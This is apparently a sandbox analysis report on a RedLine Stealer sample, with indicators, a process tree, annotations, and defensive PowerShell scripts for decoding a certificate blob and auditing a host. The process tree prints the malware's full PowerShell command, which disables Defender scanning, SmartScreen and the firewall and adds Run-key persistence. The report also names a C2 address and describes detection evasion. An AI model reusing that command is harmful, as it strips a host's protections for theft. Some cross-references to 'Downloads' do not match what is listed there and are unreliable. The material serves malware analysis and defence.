Analysis

max time kernel: 149s
max time network: 154s
platform: windows7_x64
resource: win7-20220718-en
resource tags: arch:x64, arch:x86, image:win7-20220718-en, locale:en-us, os:windows7-x64, system
submitted: 04-08-2022 11:35
Behavioral task
behavioral1
Sample
e4.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
e4.exe
Resource
win10v2004-20220722-en
General
-
Target
e4.exe
-
Size
4.5MB
-
MD5
5c371f2d51427f39d793c6df8487346c
-
SHA1
8bbc4272d6e36abf84a0d4fac47d49b690bfacdf
-
SHA256
e42c63f0af341c2271346774a69bdbceed9cc21f041680bc00e8e0d137340b48
-
SHA512
2f0d208bb52a44a085a9aa32169ba75ae3b5de2a552b2196532e59527eb7a0deb16fd87cc7363d7ec82627fdaba4ecf227bf2dd6da6331202a976a07c723ca34
Malware Config
Extracted
redline
1488
46.21.250.111:65367
-
auth_value
e1f55d6c61f97af563fc8c06a2c97666
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes: powershell.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" | powershell.exe
MpsSvc is the Windows Firewall service; Start = 4 is SERVICE_DISABLED and takes effect at the next boot. The command line in the process tree targets CurrentControlSet, which is a link to ControlSet001, and pairs this with an immediate netsh call (see Modifies Windows Firewall), so the firewall is off both now and after a reboot.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes: e4.exe
resource | yara_rule
behavioral1/memory/1740-57-0x0000000000830000-0x0000000001302000-memory.dmp | family_redline
behavioral1/memory/1740-58-0x0000000000830000-0x0000000001302000-memory.dmp | family_redline
behavioral1/memory/1740-66-0x0000000000830000-0x0000000001302000-memory.dmp | family_redline
All three hits are the same 10.8MB region of e4.exe (pid 1740), which the Themida rule also matches; the RedLine payload is unpacked in memory rather than dropped as a separate file, so these dumps are the ones to take for static analysis.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes: e4.exe, TextOutputHost.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | e4.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TextOutputHost.exe
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes: TextOutputHost.exe, UpSys.exe
pid | process
1808 | TextOutputHost.exe
976 | UpSys.exe
1464 | UpSys.exe
576 | UpSys.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: e4.exe, TextOutputHost.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | e4.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | TextOutputHost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | TextOutputHost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | e4.exe
Drops startup file 1 IoCs
Processes: TextOutputHost.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | TextOutputHost.exe
Loads dropped DLL 4 IoCs
Processes: e4.exe, TextOutputHost.exe, powershell.exe
pid | process
1740 | e4.exe
1560 | (no process name recorded)
1808 | TextOutputHost.exe
1020 | powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 13 IoCs
Processes: e4.exe, TextOutputHost.exe
resource | yara_rule
behavioral1/memory/1740-57-0x0000000000830000-0x0000000001302000-memory.dmp | themida
behavioral1/memory/1740-58-0x0000000000830000-0x0000000001302000-memory.dmp | themida
\Users\Admin\AppData\Local\Temp\TextOutputHost.exe | themida
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe | themida
\Users\Admin\AppData\Local\Temp\TextOutputHost.exe | themida
behavioral1/memory/1740-66-0x0000000000830000-0x0000000001302000-memory.dmp | themida
behavioral1/memory/1808-69-0x000000013FCD0000-0x0000000140628000-memory.dmp | themida
behavioral1/memory/1808-68-0x000000013FCD0000-0x0000000140628000-memory.dmp | themida
behavioral1/memory/1808-70-0x000000013FCD0000-0x0000000140628000-memory.dmp | themida
behavioral1/memory/1808-72-0x000000013FCD0000-0x0000000140628000-memory.dmp | themida
C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe | themida
\ProgramData\MicrosoftNetwork\System.exe | themida
behavioral1/memory/1808-80-0x000000013FCD0000-0x0000000140628000-memory.dmp | themida
Both the in-memory RedLine payload in e4.exe and the dropped TextOutputHost.exe / System.exe are Themida-protected, so static analysis of the files on disk will require unpacking; the memory dumps listed under Downloads are the practical starting point.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" | powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 2 IoCs
Processes: e4.exe, TextOutputHost.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | e4.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | TextOutputHost.exe
EnableLUA = 0 means UAC is switched off; both stages read it before the stage that needs administrative changes (the powershell.exe command in the process tree) is launched.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: e4.exe, TextOutputHost.exe
pid | process
1740 | e4.exe
1808 | TextOutputHost.exe
Drops file in Windows directory 1 IoCs
Processes: makecab.exe
description | ioc | process
File created | C:\Windows\Logs\CBS\CbsPersist_20220804133600.cab | makecab.exe
makecab.exe sits at the root of the process tree (depth 1, beside e4.exe) rather than under the sample, and compressing the Component-Based Servicing log into CbsPersist_*.cab is routine Windows servicing activity. Treat this IoC as background noise, not as sample behaviour.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description flags this as likely ransomware behaviour, but no file encryption is observed in this run; for an infostealer, drive enumeration is more consistent with locating files to collect.
-
Modifies data under HKEY_USERS 5 IoCs
Processes: UpSys.exe, powershell.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | UpSys.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | UpSys.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | UpSys.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4014132307a8d801 | powershell.exe
HKEY_USERS\.DEFAULT is the profile hive of the LocalSystem account, so the UpSys.exe instance and the powershell.exe that write here (pids 576 and 1700 in the process tree) are running as SYSTEM rather than as the Admin user who launched e4.exe. Together with the token privileges UpSys.exe enables (see Suspicious use of AdjustPrivilegeToken), this indicates that UpSys.exe is a launcher that re-runs powershell.exe under a higher-privileged token. The report does not document what its /SW:0 and /TI/ switches mean.
Modifies system certificate store 6 IoCs
Processes: TextOutputHost.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | TextOutputHost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (value elided) | TextOutputHost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | TextOutputHost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (value elided) | TextOutputHost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | TextOutputHost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (value elided) | TextOutputHost.exe
Both keys are under AuthRoot, the cache that crypt32's automatic root update fills when a process builds a TLS chain to a root that is in Microsoft's root list but not yet present locally. The blob recorded in full decodes to the ValiCert Class 2 Policy Validation Authority root (self-signed, RSA-1024, valid 1999-06-26 to 2019-06-26; Windows's friendly name for it, "Starfield Technologies", is embedded in the blob), and A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 is the SHA-1 thumbprint of DigiCert Global Root CA. Neither is an attacker-controlled CA, so this signature is consistent with a side effect of the sample's HTTPS traffic rather than with trust-store tampering.
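The blob recorded in full above can be decoded offline. The PowerShell below is an added example, not part of the sandbox report or of any tool it mentions: it walks the serialized property records that make up a SystemCertificates Blob value (DWORD property id, DWORD reserved, DWORD length, data, repeated), pulls out the stored SHA-1 hash, the friendly name and the DER certificate, and checks that the stored hash matches the certificate's actual thumbprint. The hex input is copied from the IoC row above and split at record boundaries for readability; the property-id names in the comments are CryptoAPI's CERT_*_PROP_ID constants, and the function name is this example's own.

```powershell
# Added example (not from the sandbox report): decode the AuthRoot\...\317A2AD0...\Blob
# value written by TextOutputHost.exe. Hex copied from the report, split at the
# CryptoAPI serialized-property record boundaries: PropId, reserved (=1), cbData, data.
$AuthRootBlobHex = @(
    '19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6'                          # 0x19 CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID
    '030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca6'                  # 0x03 CERT_SHA1_HASH_PROP_ID (the key name)
    '1d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6'                          # 0x1d CERT_SUBJECT_NAME_MD5_HASH_PROP_ID
    '140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4'                  # 0x14 CERT_KEY_IDENTIFIER_PROP_ID
    '090000000100000016000000301406082b0601050507030406082b06010505070301'              # 0x09 CERT_ENHKEY_USAGE_PROP_ID (emailProtection, serverAuth)
    '0b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000'  # 0x0b CERT_FRIENDLY_NAME_PROP_ID (UTF-16LE)
    '53000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c0'  # 0x53 CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID
    '0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a9'                  # 0x0f CERT_SIGNATURE_HASH_PROP_ID
    '2000000001000000eb020000'                                                          # 0x20 CERT_CERT_PROP_ID, 0x2eb = 747 bytes of DER follow
    '308202e730820250020101300d06092a864886f70d0101050500'                              #   Certificate, TBSCertificate, serial 1, sha1WithRSAEncryption
    '3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b'  #   issuer: L=ValiCert Validation Network
    '31173015060355040a130e56616c69436572742c20496e632e'                                #           O=ValiCert, Inc.
    '31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f72697479'  # OU=ValiCert Class 2 Policy Validation Authority
    '3121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f'            #           CN=http://www.valicert.com/
    '3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d'              #           E=info@valicert.com
    '301e170d3939303632363030313935345a170d3139303632363030313935345a'                  #   validity 1999-06-26 to 2019-06-26
    '3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b'  #   subject (identical to issuer: self-signed root)
    '31173015060355040a130e56616c69436572742c20496e632e'
    '31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f72697479'
    '3121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f'
    '3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d'
    '30819f300d06092a864886f70d010101050003818d0030818902818100'                        #   SubjectPublicKeyInfo: RSA, 1024-bit modulus
    'ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a9'
    '65d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f7'
    '0203010001'                                                                        #   public exponent 65537
    '300d06092a864886f70d0101050500'                                                    #   signatureAlgorithm
    '03818100'                                                                          #   signature BIT STRING, 128 bytes
    '3b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56'
    'd55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd'
) -join ''

function ConvertFrom-SerializedCertBlob {
    param([Parameter(Mandatory)][string]$Hex)

    $bytes = New-Object byte[] ($Hex.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }

    # Walk the records: DWORD PropId, DWORD reserved, DWORD cbData, then cbData bytes.
    $props = @{}
    $pos = 0
    while ($pos + 12 -le $bytes.Length) {
        $id   = [int][BitConverter]::ToUInt32($bytes, $pos)
        $len  = [int][BitConverter]::ToUInt32($bytes, $pos + 8)
        $data = New-Object byte[] $len
        [Array]::Copy($bytes, $pos + 12, $data, 0, $len)
        $props[$id] = $data
        $pos += 12 + $len
    }

    $storedSha1 = $null
    if ($props.ContainsKey(3)) { $storedSha1 = [BitConverter]::ToString($props[3]) -replace '-', '' }
    $friendly = $null
    if ($props.ContainsKey(11)) { $friendly = [Text.Encoding]::Unicode.GetString($props[11]).TrimEnd([char]0) }

    $result = [ordered]@{
        PropertyIds  = ($props.Keys | Sort-Object | ForEach-Object { '0x{0:x2}' -f $_ }) -join ' '
        StoredSha1   = $storedSha1
        FriendlyName = $friendly
    }
    if ($props.ContainsKey(32)) {
        # Property 0x20 is the raw DER certificate; let .NET parse it and recompute the thumbprint.
        $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList @(,$props[32])
        $result.Subject         = $cert.Subject
        $result.Issuer          = $cert.Issuer
        $result.NotBefore       = $cert.NotBefore
        $result.NotAfter        = $cert.NotAfter
        $result.ComputedSha1    = $cert.Thumbprint
        $result.SelfSigned      = ($cert.Subject -eq $cert.Issuer)
        $result.ThumbprintMatch = ($cert.Thumbprint -eq $storedSha1)
    }
    [pscustomobject]$result
}

ConvertFrom-SerializedCertBlob -Hex $AuthRootBlobHex | Format-List
```

On this input the function reports FriendlyName "Starfield Technologies", the ValiCert Class 2 Policy Validation Authority subject, a NotAfter of 26 June 2019, SelfSigned True and ThumbprintMatch True: the value Windows cached is an expired public root whose stored hash is consistent with its contents, not a rogue CA. The same function works on any Blob value read back with Get-ItemProperty from a host's SystemCertificates keys.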
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: e4.exe, TextOutputHost.exe, powershell.exe, UpSys.exe
pid | process | hits
1740 | e4.exe | 1
1808 | TextOutputHost.exe | 57 (all remaining entries of the 64)
1020 | powershell.exe | 1
976 | UpSys.exe | 2
1464 | UpSys.exe | 2
1700 | powershell.exe | 1
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes: e4.exe, powershell.exe, UpSys.exe
pid | process | privilege
1740 | e4.exe | SeDebugPrivilege
1020 | powershell.exe | SeDebugPrivilege
976 | UpSys.exe | SeDebugPrivilege
976 | UpSys.exe | SeAssignPrimaryTokenPrivilege
976 | UpSys.exe | SeIncreaseQuotaPrivilege
976 | UpSys.exe | 0 (recorded literally as "Token: 0")
1464 | UpSys.exe | SeDebugPrivilege
1464 | UpSys.exe | SeAssignPrimaryTokenPrivilege
1464 | UpSys.exe | SeIncreaseQuotaPrivilege
1700 | powershell.exe | SeDebugPrivilege
SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege are the pair CreateProcessAsUser requires, and SeDebugPrivilege is what a process needs to open another process's token; their combination in both UpSys.exe instances is the classic footprint of a launcher that duplicates a privileged token (for example SYSTEM's) and starts a child under it, which matches the SYSTEM-profile writes recorded under Modifies data under HKEY_USERS.
Suspicious use of WriteProcessMemory 16 IoCs
Processes: e4.exe, TextOutputHost.exe, powershell.exe, UpSys.exe
pid | process | target pid | target process | writes
1740 | e4.exe | 1808 | TextOutputHost.exe | 4
1808 | TextOutputHost.exe | 1020 | powershell.exe | 3
1020 | powershell.exe | 976 | UpSys.exe | 3
1020 | powershell.exe | 472 | netsh.exe | 3
576 | UpSys.exe | 1700 | powershell.exe | 3
Every write goes from a parent to its own direct child and mirrors the process tree below; this is the normal pattern of process creation (the parent writes the new process's parameters into its address space before it starts) and is not, by itself, evidence of injection into a foreign process.
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\e4.exe
command line: "C:\Users\Admin\AppData\Local\Temp\e4.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe
command line: "C:\Users\Admin\AppData\Local\Temp\TextOutputHost.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
What this command does: the outer powershell.exe (pid 1020) evaluates the $( ) subexpressions itself, which is why the MpsSvc, Run-key and netsh IoCs above are attributed to it, and it also launches C:\ProgramData\UpSys.exe with the arguments /SW:0 powershell.exe (the meaning of UpSys.exe's switches is not documented in the report).
- Add-MpPreference -ExclusionPath C:\ excludes the entire system drive from Defender scanning.
- cd HKLM:\ followed by paths written as $HKLM\SOFTWARE\...: $HKLM is never defined, so it expands to nothing and the paths become \SOFTWARE\..., which PowerShell resolves against the root of the current HKLM: drive. The recorded IoCs confirm the writes landed.
- EnableSmartScreen = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows\System disables SmartScreen by policy.
- mpssvc Start = 4 sets the Windows Firewall service to Disabled for subsequent boots; netsh advfirewall set allprofiles state off (pid 472, below) turns it off immediately.
- Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork copies the restrictive ACL of the SystemData folder (SYSTEM-only on a stock install) onto the drop directory, so the persisted payload is not readable by the interactive user.
- Run\WinNet = C:\ProgramData\MicrosoftNetwork\System.exe is the persistence entry; System.exe has the same hashes as the dropped TextOutputHost.exe (see Downloads).
- check.txt containing "1" is written to C:\ProgramData, most plausibly a marker that setup has already run; the report does not show it being read.
- The –Path and –Name switches use an en dash (U+2013) rather than a hyphen. PowerShell accepts it as a parameter prefix, so the command runs as written, and a detection rule that matches only the ASCII -Path / -Name spelling misses it.
- Modifies security service
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[depth 4] C:\ProgramData\UpSys.exe
command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 5] C:\ProgramData\UpSys.exe
command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 6] C:\ProgramData\UpSys.exe
command line: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[depth 4] C:\Windows\system32\netsh.exe
command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
- Modifies Windows Firewall
-
[depth 1] C:\Windows\system32\makecab.exe
command line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220804133600.log C:\Windows\Logs\CBS\CbsPersist_20220804133600.cab
- Drops file in Windows directory
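To check a suspect host for what the stage-3 powershell.exe command line in the tree above changes, the following PowerShell is an added example, not part of the sandbox report or of any tool it mentions. It reads back each setting that command writes (the Defender exclusion, the SmartScreen policy, the mpssvc Start value, the firewall profile state, the WinNet Run key) and tests for the dropped files and the Startup shortcut recorded in the IoC tables. Every path and value is taken from the report; the function name and the shape of its output are this example's own. Run it from an elevated session on Windows 7 or later; the payload inside C:\ProgramData\MicrosoftNetwork may only be visible when running as SYSTEM, because of the copied ACL.

```powershell
# Added example (not from the sandbox report): audit a host for the artifacts left by
# the stage-3 powershell.exe command. Paths and registry values are those recorded in
# the report; nothing else about the host is assumed. Run elevated.
function Test-RedLineDropperArtifacts {
    [CmdletBinding()]
    param()

    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Check, [bool]$Hit, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Check = $Check; Hit = $Hit; Detail = $Detail })
    }

    # 1. Add-MpPreference -ExclusionPath C:\  -> whole system drive excluded from Defender.
    #    Get-MpPreference is absent on Windows 7, hence the guard.
    $exclusions = @()
    if (Get-Command Get-MpPreference -ErrorAction SilentlyContinue) {
        $exclusions = @((Get-MpPreference).ExclusionPath)
    }
    Add-Finding 'Defender ExclusionPath contains C:\' ($exclusions -contains 'C:\') ($exclusions -join '; ')

    # 2. EnableSmartScreen = 0 under the Windows\System policy key -> SmartScreen disabled by policy.
    $ss = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' -Name EnableSmartScreen -ErrorAction SilentlyContinue
    $ssDetail = if ($ss) { "$($ss.EnableSmartScreen)" } else { 'not set' }
    Add-Finding 'Policy EnableSmartScreen = 0' ($null -ne $ss -and $ss.EnableSmartScreen -eq 0) $ssDetail

    # 3. mpssvc Start = 4 -> Windows Firewall service disabled at the next boot.
    $svc = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\mpssvc' -Name Start -ErrorAction SilentlyContinue
    $svcDetail = if ($svc) { "$($svc.Start)" } else { 'not set' }
    Add-Finding 'mpssvc Start = 4 (service disabled)' ($null -ne $svc -and $svc.Start -eq 4) $svcDetail

    # 4. netsh advfirewall set allprofiles state off -> profiles currently switched off.
    #    Prefer the NetSecurity cmdlet; fall back to parsing netsh text on Windows 7.
    if (Get-Command Get-NetFirewallProfile -ErrorAction SilentlyContinue) {
        $off = @(Get-NetFirewallProfile | Where-Object { "$($_.Enabled)" -eq 'False' } | ForEach-Object Name)
        $fwDetail = $off -join ', '
    } else {
        $off = @(netsh advfirewall show allprofiles state | Select-String -Pattern '^\s*State\s+OFF')
        $fwDetail = "$($off.Count) profile(s) report State OFF"
    }
    Add-Finding 'Firewall profile(s) disabled' ($off.Count -gt 0) $fwDetail

    # 5. Run\WinNet = C:\ProgramData\MicrosoftNetwork\System.exe -> persistence entry.
    $run = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name WinNet -ErrorAction SilentlyContinue
    $runDetail = if ($run) { "$($run.WinNet)" } else { '' }
    Add-Finding 'Run key WinNet present' ($null -ne $run) $runDetail

    # 6. Dropped files and markers from the report: the UpSys.exe launcher, the ACL-protected
    #    drop folder and its System.exe, the check.txt marker, and the Startup-folder exe.lnk.
    $paths = @(
        'C:\ProgramData\UpSys.exe',
        'C:\ProgramData\MicrosoftNetwork',
        'C:\ProgramData\MicrosoftNetwork\System.exe',   # hidden by the copied SystemData ACL unless run as SYSTEM
        'C:\ProgramData\check.txt'
    )
    $paths += @(Get-ChildItem -Path "$env:SystemDrive\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk" -ErrorAction SilentlyContinue | ForEach-Object FullName)
    foreach ($p in $paths) {
        Add-Finding "Path exists: $p" (Test-Path -LiteralPath $p) ''
    }

    $findings
}

# Usage: list every check, then only the hits.
Test-RedLineDropperArtifacts | Format-Table Check, Hit, Detail -AutoSize
Test-RedLineDropperArtifacts | Where-Object Hit
```

Each check corresponds to one statement of the observed command line, so a hit can be tied back to the exact action that produced it; the file checks deliberately test the MicrosoftNetwork directory itself as well as the System.exe inside it, because the ACL copied from SystemData can make the file invisible to an administrator while the directory entry remains visible.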
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\ProgramData\UpSys.exe (also recorded as \ProgramData\UpSys.exe; identical file in each entry)
Filesize 923KB
MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
